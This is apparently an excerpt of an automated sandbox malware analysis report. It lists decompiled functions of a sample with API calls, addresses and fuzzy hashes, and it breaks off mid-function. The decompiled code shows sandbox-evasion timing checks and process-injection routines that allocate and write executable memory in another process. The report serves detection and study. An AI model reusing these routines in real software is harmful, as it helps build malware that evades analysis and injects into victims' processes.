0x004039ef
0x004039f0
0x004039f1
0x004039f2
0x004039f3
0x004039f4
0x00403a00
0x00403a04
0x00403a07
0x00403a0f
0x00403a23
0x00403a26
0x00403a29
0x00403a30
0x00403a33
0x00403a36
0x00403a39
0x00403a3c
0x00403a44
0x00403a83
0x00403a46
0x00403a4f
0x00403a54
0x00403a58
0x00403a61
0x00403a71
0x00403a73
0x00403a78
0x00403a78
0x00403a73
0x00403a58
0x00403a88
0x00403a91
0x00403a91
0x00403a9d

APIs

NtCreateSection.NTDLL(00000000,000F001F,?,?,00000040,08000000,00000000), ref: 00403A3C
memset.NTDLL ref: 00403A61
RtlNtStatusToDosError.NTDLL(00000000), ref: 00403A7D
ZwClose.NTDLL(00000000), ref: 00403A91

Part of subcall function 004039A2: NtMapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000040), ref: 004039CF
Part of subcall function 004039A2: RtlNtStatusToDosError.NTDLL(00000000), ref: 004039D6

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ErrorSectionStatus$CloseCreateViewmemset
String ID:
API String ID: 783833395-0
Opcode ID: f8669161a60cf2724b1120e9c60a29a5a7d55d361bb606c69fe425f2f9ecc702
Instruction ID: 8cebfd70dc6d5950fd83839cc6c3e57c5d3bb6dfbf32e8e2b8b695bdb7af8862
Opcode Fuzzy Hash: f8669161a60cf2724b1120e9c60a29a5a7d55d361bb606c69fe425f2f9ecc702
Instruction Fuzzy Hash: 13211671A00229AFCB11CFA8CC449EFBBB9EB48711F100526F951F6290D7759A148FA5

Uniqueness

Uniqueness Score: -1,00%

Function 002C215E, Relevance: 4.8, APIs: 3, Instructions: 251
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,00001000,00000040,?), ref: 002C2260
VirtualProtect.KERNELBASE(00000000,?,00000002,?), ref: 002C2375
VirtualProtect.KERNELBASE(?,?,?,?), ref: 002C23E2

Memory Dump Source

Source File: 00000000.00000002.1499824136.002C0000.00000040.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c0000_rb5iJg6pgN.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b34f7211ebde234055a9de3a9788a0f987b63f98ba09c2580772f9b13258e813
Instruction ID: 435cb8cb080c092d18135b2ec36645c720de504d2369f6e0059d8e2013bc4d25
Opcode Fuzzy Hash: b34f7211ebde234055a9de3a9788a0f987b63f98ba09c2580772f9b13258e813
Instruction Fuzzy Hash: 9EC1C3B4E11209DFCB18CF94D981EAEB7B5FF88304F248219E805AB356DB34A955CF90

Uniqueness

Uniqueness Score: -1,00%

Function 00402C3D, Relevance: 4.5, APIs: 3, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C3D(void* __ecx, void* _a4) {
				void* _v8;
				long _v12;
				long _t14;

				_v8 = _v8 & 0x00000000;
				if( *0x4064c0 != 0) {
					_v8 = _v8 & 0x00000000;
					_v12 = 0x318;
					_t14 = NtAllocateVirtualMemory(_a4,  &_v8, 0,  &_v12, 0x3000, 0x40); // executed
					if(_t14 < 0) {
						SetLastError(RtlNtStatusToDosError(_t14));
						_v8 = _v8 & 0x00000000;
					}
				}
				return _v8;
			}

0x00402c47
0x00402c4d
0x00402c4f
0x00402c67
0x00402c6e
0x00402c72
0x00402c7c
0x00402c82
0x00402c82
0x00402c72
0x00402c8a

APIs

NtAllocateVirtualMemory.NTDLL(0040277C,00000000,00000000,0040277C,00003000,00000040), ref: 00402C6E
RtlNtStatusToDosError.NTDLL(00000000), ref: 00402C75
SetLastError.KERNEL32(00000000), ref: 00402C7C

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Error$AllocateLastMemoryStatusVirtual
String ID:
API String ID: 722216270-0
Opcode ID: f355dad52cc8151f59a706d3a06b73d0770f0e086e43224e1d19c26dc024df13
Instruction ID: 5da87099c1b96c2f96a69c08618266092e30e071dc49047c0f56da71c8e2ea26
Opcode Fuzzy Hash: f355dad52cc8151f59a706d3a06b73d0770f0e086e43224e1d19c26dc024df13
Instruction Fuzzy Hash: 49F0FEB1910309FBFB05CB95DE09BAE76BCEB14359F104158A601B61C0DBB8EB04DB68

Uniqueness

Uniqueness Score: -1,00%

Function 00402BE5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402BE5(void* _a4, void* _a8, void* _a12, long _a16, char _a20) {
				long _t8;
				void* _t9;

				_t9 = 0;
				if( *0x4064b8 != 0) {
					_t1 =  &_a20; // 0x402b2c
					_t8 = NtReadVirtualMemory(_a4, _a8, _a12, _a16,  *_t1); // executed
					if(_t8 >= 0) {
						_t9 = 1;
					}
				}
				return _t9;
			}

0x00402bee
0x00402bf2
0x00402bf4
0x00402c03
0x00402c07
0x00402c09
0x00402c09
0x00402c07
0x00402c0e

APIs

NtReadVirtualMemory.NTDLL(?,?,?,?,,+@,00000000,?,00402B2C,00000000,?,00000000,000001E8,00000000,?,?,00000000), ref: 00402C03

Strings

,+@, xrefs: 00402BF4

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: MemoryReadVirtual
String ID: ,+@
API String ID: 2834387570-3468352111
Opcode ID: d8f69bdb31dc94cb8c1b2ec037038e673e8b3eacf96c0adb24e1fc32024adf1b
Instruction ID: e840c80441a9c8d73837549fe2170cae99a90c5dd712a85f098d745593865841
Opcode Fuzzy Hash: d8f69bdb31dc94cb8c1b2ec037038e673e8b3eacf96c0adb24e1fc32024adf1b
Instruction Fuzzy Hash: BFD0123220021EABDF014ED9DD40DDB7B5DBB087807004021BF01D1160C771D831A7E4

Uniqueness

Uniqueness Score: -1,00%

Function 00401260, Relevance: 3.1, APIs: 2, Instructions: 58
sleepCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00401260(intOrPtr __eax, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v24;
				signed int _v28;
				intOrPtr _t20;
				void* _t25;
				void* _t27;
				intOrPtr _t34;
				intOrPtr _t45;

				_t34 = __edx;
				_t20 = __eax;
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v16 = 0xa;
				do {
					asm("rdtsc");
					_v12 = _t20;
					_v8 = _t34;
					asm("cpuid");
					asm("rdtsc");
					_v12 = 0;
					_v8 = _t34;
					_t34 = _v12;
					_t20 = _t34 - _v12;
					asm("sbb ecx, esi");
					_v28 = _v28 + _t20;
					asm("adc [ebp-0x14], ecx"); // executed
					Sleep(0x1f4); // executed
					_t16 =  &_v16;
					 *_t16 = _v16 - 1;
				} while ( *_t16 != 0);
				_push(0);
				_push(0xa);
				_push(_v24);
				_push(_v28);
				L004041B0();
				_t25 = _t20 + 0xffffffff;
				asm("adc edx, 0xffffffff");
				_t45 = _t34;
				if(_t45 > 0 || _t45 >= 0 && _t25 > 0x9c3e) {
					_t27 = 1;
				} else {
					_t27 = 0;
				}
				return _t27;
			}

0x00401260
0x00401260
0x00401266
0x0040126a
0x00401271
0x00401278
0x00401278
0x0040127a
0x0040127d
0x00401290
0x00401292
0x00401294
0x00401297
0x0040129a
0x004012a8
0x004012aa
0x004012ac
0x004012b4
0x004012b7
0x004012bd
0x004012bd
0x004012bd
0x004012c2
0x004012c3
0x004012c5
0x004012c8
0x004012cb
0x004012d0
0x004012d3
0x004012d6
0x004012d8
0x004012e9
0x004012e3
0x004012e3
0x004012e3
0x004012ee

APIs

Sleep.KERNELBASE(000001F4,00000000,7734DAA3,00000000), ref: 004012B7
_aulldiv.NTDLL(00000000,00000000,0000000A,00000000), ref: 004012CB

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: Sleep_aulldiv
String ID:
API String ID: 3844048266-0
Opcode ID: 940452b750c2e3023182a1cef135b467bcd6d5503de378a9e5bec3963569a294
Instruction ID: d45f2b6607c147b094f38face8ae904818ddc01b7652475746b219217371d149
Opcode Fuzzy Hash: 940452b750c2e3023182a1cef135b467bcd6d5503de378a9e5bec3963569a294
Instruction Fuzzy Hash: 4E117071E00209AFDF04DFF589856AFBBF1EF95325F20827A9511F21D0E2344A008A94

Uniqueness

Uniqueness Score: -1,00%

Function 00402AD0, Relevance: 3.0, APIs: 2, Instructions: 37
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402AD0(void* _a4) {
				long _v12;
				void* _v32;
				void _v36;
				intOrPtr _v520;
				void _v527;
				char _v528;
				long _t15;
				void* _t19;
				union _PROCESSINFOCLASS _t20;

				_v528 = 0;
				memset( &_v527, 0, 0x1e7);
				_t20 = 0;
				_t15 = NtQueryInformationProcess(_a4, 0,  &_v36, 0x18,  &_v12); // executed
				if(_t15 >= 0) {
					_t19 = E00402BE5(_a4, _v32,  &_v528, 0x1e8,  &_v12); // executed
					if(_t19 != 0) {
						_t20 = _v520;
					}
				}
				return _t20;
			}

0x00402ae8
0x00402aef
0x00402b01
0x00402b07
0x00402b0f
0x00402b27
0x00402b2e
0x00402b30
0x00402b30
0x00402b2e
0x00402b3a

APIs

memset.NTDLL ref: 00402AEF
NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000,?,?,00000000), ref: 00402B07

Part of subcall function 00402BE5: NtReadVirtualMemory.NTDLL(?,?,?,?,,+@,00000000,?,00402B2C,00000000,?,00000000,000001E8,00000000,?,?,00000000), ref: 00402C03

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: InformationMemoryProcessQueryReadVirtualmemset
String ID:
API String ID: 3868834506-0
Opcode ID: cc687e5491b64aef3a35b31a294fcde156bb9213ad7f267b0f949eca4d237667
Instruction ID: 3a331a9203f2f965f124ac373d1e70e83b03161ea7af281253b2da942844d33f
Opcode Fuzzy Hash: cc687e5491b64aef3a35b31a294fcde156bb9213ad7f267b0f949eca4d237667
Instruction Fuzzy Hash: 38F0FFB6900268BAEB20DF95CD09FDF7B7CAB04744F4040A5BA08F61D1E774EA558BA4

Uniqueness

Uniqueness Score: -1,00%

Function 004039A2, Relevance: 3.0, APIs: 2, Instructions: 28
nativeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004039A2(void* _a4, void* _a8, PVOID* _a12) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t12;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t12 = NtMapViewOfSection(_a4, _a8, _a12, 0, 0,  &_v16,  &_v8, 2, 0, 0x40); // executed
				return RtlNtStatusToDosError(_t12);
			}

0x004039b2
0x004039b8
0x004039c6
0x004039cf
0x004039de

APIs

NtMapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000040), ref: 004039CF
RtlNtStatusToDosError.NTDLL(00000000), ref: 004039D6

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ErrorSectionStatusView
String ID:
API String ID: 1313840181-0
Opcode ID: 41d3da428e79af1cbb04efa36c768bc5a3575d0df87aefec6e7c17cba8d20198
Instruction ID: cc63277b90781630adbbae84ee047c0d4cdebd68caebca74a3ee8b9c255ea448
Opcode Fuzzy Hash: 41d3da428e79af1cbb04efa36c768bc5a3575d0df87aefec6e7c17cba8d20198
Instruction Fuzzy Hash: E8E0E5B6900208FFEF059F94DD0FEDF7B7DEB44300F00856AB611A5150E6B0AA149F60

Uniqueness

Uniqueness Score: -1,00%

Function 00402C11, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C11(void* _a4, void* _a8, void* _a12, long _a16, long* _a20) {
				long _t8;
				void* _t9;

				_t9 = 0;
				if( *0x4064bc != 0) {
					_t8 = NtWriteVirtualMemory(_a4, _a8, _a12, _a16, _a20); // executed
					if(_t8 >= 0) {
						_t9 = 1;
					}
				}
				return _t9;
			}

0x00402c1a
0x00402c1e
0x00402c2f
0x00402c33
0x00402c35
0x00402c35
0x00402c33
0x00402c3a

APIs

NtWriteVirtualMemory.NTDLL(00000000,?,00000004,?,00000000,77390479,?,00403089,00000000,?,00000004,00000004,00000000), ref: 00402C2F

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: df0e279e9d902ab14db2f2811dafce2746021e459353a3a1f26a6081f36d32ab
Instruction ID: 04b38c236baf5c2fa63d184e974e83718839d2ee9d84a74d68012460cef51d9d
Opcode Fuzzy Hash: df0e279e9d902ab14db2f2811dafce2746021e459353a3a1f26a6081f36d32ab
Instruction Fuzzy Hash: 3BD0123220011EB7DF214ED9DD00D8B7B5DBB087807004025BE01D1160D776D931A7E8

Uniqueness

Uniqueness Score: -1,00%

Function 00437BC3, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00437BC3(_Unknown_base(*)()* _a4) {
				_Unknown_base(*)()* _t2;

				_t2 = SetUnhandledExceptionFilter(_a4); // executed
				return _t2;
			}

0x00437bc9
0x00437bd0

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00437BC9

Memory Dump Source

Source File: 00000000.00000001.1467662684.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.1467651208.00400000.00000002.sdmp Download File
Associated: 00000000.00000001.1468130389.0044D000.00000002.sdmp Download File
Associated: 00000000.00000001.1468513258.00469000.00000004.sdmp Download File
Associated: 00000000.00000001.1468552339.0046E000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5ee5494cc9e3df622433f7e1c79c112700692a418e437cf24f0990c32894e252
Instruction ID: 13391709ec9a2780f5e721227b30d592ecd02338bec382a0e1b0c5b729858cc5
Opcode Fuzzy Hash: 5ee5494cc9e3df622433f7e1c79c112700692a418e437cf24f0990c32894e252
Instruction Fuzzy Hash: F8A0113000020CAB8A002B82EC088A83F2CEA022A0B000020F80C002208B3AA8208A88

Uniqueness

Uniqueness Score: -1,00%

Function 00401B21, Relevance: 42.2, APIs: 7, Strings: 17, Instructions: 164
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00401B21(void* __edx, void* __eflags) {
				int _v540;
				int _v544;
				char _v548;
				void* _v552;
				void* _v560;
				void _v580;
				struct HINSTANCE__* _v584;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				signed int _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v605;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				signed int _v624;
				void* __edi;
				void* _t63;
				signed int _t69;
				int* _t71;
				struct HINSTANCE__* _t72;
				int* _t74;
				signed int _t78;
				int* _t84;
				int* _t88;
				long _t90;
				int* _t92;
				signed int _t94;
				void* _t96;
				CHAR* _t97;
				signed int _t98;
				signed int _t100;
				void* _t101;
				struct HWND__* _t108;
				struct HINSTANCE__* _t110;
				int* _t116;

				_t101 = __edx;
				_t98 = 7;
				_v597 = _t98;
				memcpy( &_v580, 0x405264, _t98 << 2);
				asm("movsw");
				_t108 = 0;
				_v620 = 0x99;
				_v619 = 0x44;
				_v618 = 0x87;
				_v617 = 0x44;
				_v616 = 0x26;
				_v615 = 0xfc;
				_v614 = 0x1f;
				_v613 = 0xbe;
				_v612 = 0x3b;
				_v611 = 0x33;
				_v610 = 0x30;
				_v609 = 0x24;
				_v608 = 0xf0;
				_v607 = 0x47;
				_v606 = 0xf0;
				_v605 = 0x83;
				_v604 = 0xf5;
				_v603 = 0xe5;
				_v602 = 0xe3;
				_v601 = 0xdd;
				_v600 = 0xf7;
				_v599 = 0x23;
				_v598 = 0xb9;
				_v596 = 0xf5;
				_v595 = 0x2d;
				_v594 = 0xfc;
				_v593 = 0x2a;
				_v592 = 0xed;
				_v591 = 0x64;
				_v590 = 0xd8;
				_v589 = 0x34;
				_v588 = 0xe9;
				_v587 = 0x65;
				_v624 = GetModuleHandleA(0);
				_t63 = E004011D3(0); // executed
				_t125 = _t63 - 0xf;
				if(_t63 == 0xf) {
					goto L7;
					do {
						do {
							L7:
							_t39 =  &_v624;
							 *_t39 =  &(_v624->i);
							__eflags =  *_t39;
						} while ( *_t39 == 0);
						_t100 = 0xb;
						_t103 = _v624 % _t100;
						_t94 = E00402C8D(_v624 % _t100);
						SwitchToThread();
						__eflags = _t94 - 6;
					} while (_t94 == 6);
					__eflags = _t94 - _t108;
					if(_t94 != _t108) {
						L24:
						E00401AB5(_t100);
						_t69 = _t94;
						L25:
						return _t69;
					}
					E00402055(_t100); // executed
					_t71 = E0040213C(_t100, 0xffffffff); // executed
					__eflags = _t71;
					if(_t71 != 0) {
						 *0x406464 = 1;
					}
					_v624 = _t108;
					_t72 = GetModuleHandleA("NTDLL.DLL");
					__eflags = _t72 - _t108;
					_v584 = _t72;
					if(_t72 == _t108) {
						_v624 = 0x7e;
						L21:
						_t94 = _v624;
						__eflags = _t94 - _t108;
						if(__eflags == 0) {
							_t74 = E00401922( &_v548, __eflags);
							__eflags = _t74;
							if(_t74 != 0) {
								_t78 = E00401A10(_t100, _t103, __eflags, E00402F3D( &_v580),  &_v548); // executed
								_t94 = _t78;
								E00401686(_t76);
								memset(_v560, _t108, _v544);
								memset(_v552, _t108, _v540);
							}
						}
						goto L24;
					}
					_t96 = 0;
					__eflags = 0;
					while(1) {
						_t48 = _t96 + 0x406348; // 0xc2637319
						_t116 = 0;
						_t110 = _v584;
						_t84 = E00402DD7(_t110, _t108,  *_t48 ^  *0x4064c4);
						__eflags = _t84;
						if(_t84 != 0) {
							_t116 = _t110 +  *_t84;
							__eflags = _t116;
						}
						_t108 = 0;
						__eflags = _t116;
						 *(_t96 + 0x4064b0) = _t116;
						if(_t116 == 0) {
							break;
						}
						_t96 = _t96 + 4;
						__eflags = _t96 - 0x14;
						if(_t96 < 0x14) {
							continue;
						}
						goto L21;
					}
					_v624 = 0x7f;
					goto L21;
				}
				_t97 = E00402F3D( &_v620);
				if(E004013D6(0, _t101, _t125) == 0) {
					_t88 = E00401453(); // executed
					__eflags = _t88;
					if(_t88 != 0) {
						goto L2;
					}
					_t90 = GetTickCount();
					__eflags = _t90 - 0x61a8;
					if(_t90 <= 0x61a8) {
						L6:
						E00401686(_t97);
						goto L7;
					}
					_t92 = E00401260(_t90, _t101); // executed
					__eflags = _t92;
					if(_t92 != 0) {
						goto L2;
					}
					goto L6;
				}
				L2:
				MessageBoxA(_t108, _t97, _t108, 0x10);
				_t69 = 0;
				goto L25;
			}

0x00401b21
0x00401b32
0x00401b33
0x00401b40
0x00401b42
0x00401b4a
0x00401b4d
0x00401b52
0x00401b57
0x00401b5c
0x00401b61
0x00401b66
0x00401b6b
0x00401b70
0x00401b75
0x00401b7a
0x00401b7f
0x00401b84
0x00401b89
0x00401b8e
0x00401b93
0x00401b98
0x00401b9d
0x00401ba2
0x00401ba7
0x00401bac
0x00401bb1
0x00401bb6
0x00401bbb
0x00401bc0
0x00401bc5
0x00401bca
0x00401bcf
0x00401bd4
0x00401bd9
0x00401bde
0x00401be3
0x00401be8
0x00401bed
0x00401bf4
0x00401bf8
0x00401bfd
0x00401c00
0x00000000
0x00401c4d
0x00401c4d
0x00401c4d
0x00401c4d
0x00401c4d
0x00401c4d
0x00401c4d
0x00401c59
0x00401c5c
0x00401c64
0x00401c66
0x00401c6c
0x00401c6c
0x00401c71
0x00401c73
0x00401d46
0x00401d46
0x00401d4b
0x00401d4d
0x00401d53
0x00401d53
0x00401c79
0x00401c80
0x00401c85
0x00401c87
0x00401c89
0x00401c89
0x00401c98
0x00401c9c
0x00401c9e
0x00401ca0
0x00401ca4
0x00401ce9
0x00401cf1
0x00401cf1
0x00401cf5
0x00401cf7
0x00401cfd
0x00401d02
0x00401d04
0x00401d17
0x00401d1d
0x00401d1f
0x00401d2d
0x00401d3e
0x00401d43
0x00401d04
0x00000000
0x00401cf7
0x00401ca6
0x00401ca6
0x00401ca8
0x00401ca8
0x00401cb4
0x00401cb8
0x00401cbc
0x00401cc1
0x00401cc3
0x00401cc7
0x00401cc7
0x00401cc7
0x00401cc9
0x00401ccb
0x00401ccd
0x00401cd3
0x00000000
0x00000000
0x00401cd5
0x00401cd8
0x00401cdb
0x00000000
0x00000000
0x00000000
0x00401cdd
0x00401cdf
0x00000000
0x00401cdf
0x00401c0b
0x00401c14
0x00401c28
0x00401c2d
0x00401c2f
0x00000000
0x00000000
0x00401c31
0x00401c37
0x00401c3c
0x00401c47
0x00401c48
0x00000000
0x00401c48
0x00401c3e
0x00401c43
0x00401c45
0x00000000
0x00000000
0x00000000
0x00401c45
0x00401c16
0x00401c1b
0x00401c21
0x00000000

APIs

GetModuleHandleA.KERNEL32 ref: 00401BF2

Part of subcall function 004011D3: GetTempPathA.KERNEL32(00000100,?), ref: 004011F5
Part of subcall function 004011D3: lstrcatA.KERNEL32(?,?), ref: 00401206
Part of subcall function 004011D3: HeapFree.KERNEL32(00000000,?,00000000), ref: 00401254

MessageBoxA.USER32(00000000,00000000,00000000,00000010), ref: 00401C1B
GetTickCount.KERNEL32 ref: 00401C31
SwitchToThread.KERNEL32(00000000), ref: 00401C66
GetModuleHandleA.KERNEL32(NTDLL.DLL,000000FF), ref: 00401C9C
memset.NTDLL ref: 00401D2D
memset.NTDLL ref: 00401D3E

Strings

D, xrefs: 00401B52
G, xrefs: 00401B8E
dR@, xrefs: 00401B37
0, xrefs: 00401B7F
-, xrefs: 00401BC5
e, xrefs: 00401BED
*, xrefs: 00401BCF
&, xrefs: 00401B61
#, xrefs: 00401BB6
d, xrefs: 00401BD9
4, xrefs: 00401BE3
D, xrefs: 00401B5C
;, xrefs: 00401B75
NTDLL.DLL, xrefs: 00401C93
~, xrefs: 00401CE9
3, xrefs: 00401B7A
$, xrefs: 00401B84

Memory Dump Source

Source File: 00000000.00000002.1499996558.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1499976703.00400000.00000002.sdmp Download File
Associated: 00000000.00000002.1500023558.00405000.00000002.sdmp Download File
Associated: 00000000.00000002.1500032102.00406000.00000004.sdmp Download File
Associated: 00000000.00000002.1500050558.00408000.00000002.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rb5iJg6pgN.jbxd

Yara matches

Similarity

API ID: HandleModulememset$CountFreeHeapMessagePathSwitchTempThreadTicklstrcat
String ID: #$$$&$*$-$0$3$4$;$D$D$G$NTDLL.DLL$d$dR@$e$~
API String ID: 1710646270-2985576706
Opcode ID: 7613b032d968f631d137b37d3f79ec0cf18a296f4d7bfe884e81507fa76b69a4
Instruction ID: 5d43a5c2be0b3abf5252f5bf9f3eaffcc6145f8c2694ace8125a94020e53a267
Opcode Fuzzy Hash: 7613b032d968f631d137b37d3f79ec0cf18a296f4d7bfe884e81507fa76b69a4
Instruction Fuzzy Hash: 5351B53040C3C18AD321DB79884861FBED55F96328F080B6EF4E56A2E2D779C905C7AB

Uniqueness

Uniqueness Score: -1,00%

Function 0044972D, Relevance: 38.1, APIs: 25, Instructions: 614
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0044972D(void* __ebx, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, signed int _a24) {
				signed int _v0;
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				char _v60;
				void* __edi;
				void* __ebp;
				void* _t202;
				void* _t204;
				signed int _t207;
				signed short _t208;
				signed short _t210;
				void* _t215;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				void* _t224;
				signed int _t225;
				signed int _t234;
				signed int _t246;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t270;
				signed int _t273;
				signed int _t275;
				void* _t278;
				signed int _t279;
				signed int* _t282;
				signed int _t283;
				signed int _t285;
				signed int _t290;
				signed int _t291;
				signed int _t293;
				signed int _t294;
				void* _t296;
				intOrPtr _t309;
				signed int _t316;
				signed int _t317;
				signed int* _t322;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				void* _t329;
				signed int* _t333;
				signed int _t336;
				void* _t337;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed char _t353;
				signed char _t359;
				signed int _t368;
				signed int _t370;
				signed int _t372;
				signed int _t380;
				signed int _t381;
				signed int _t383;
				void* _t385;
				signed int _t386;
				void* _t387;
				signed int _t389;
				signed int _t390;
				signed int _t392;
				signed int _t398;
				signed int _t400;
				signed int _t405;
				signed int _t406;
				signed int* _t407;
				void* _t409;
				signed int _t410;
				signed short _t411;
				void* _t413;
				signed int _t416;
				signed int _t420;
				signed int _t423;
				signed int _t424;
				void* _t427;
				void* _t429;
				void* _t431;

				_t409 = __esi;
				_push(__ebx);
				_t336 = 0;
				_v36 = 0;
				_v6 = 0;
				_v60 = 0xc;
				_v56 = 0;
				if((_a16 & 0x00000080) == 0) {
					_v52 = 1;
					_v5 = 0;
				} else {
					_v52 = 0;
					_v5 = 0x10;
				}
				_t202 = E0044C5AE( &_v36);
				_pop(_t341);
				if(_t202 != 0) {
					_push(_t336);
					_push(_t336);
					_push(_t336);
					_push(_t336);
					_push(_t336);
					E00439530(_t336, _t385);
					asm("int3");
					__eflags =  *0x46c3f0;
					_push(_t403);
					if( *0x46c3f0 != 0) {
						_t204 = L00449F32(_v0, _a4, _a8, 0);
					} else {
						_t405 = _a8;
						_t204 = 0;
						__eflags = _t405;
						if(_t405 != 0) {
							_t386 = _v0;
							__eflags = _t386;
							if(__eflags != 0) {
								_t342 = _a4;
								__eflags = _t342;
								if(__eflags == 0) {
									goto L153;
								} else {
									_push(_t336);
									_push(_t409);
									_t337 = 0x41;
									_t410 = 0x5a;
									_t387 = _t386 - _t342;
									_v12 = _t410;
									while(1) {
										_t207 =  *(_t387 + _t342) & 0x0000ffff;
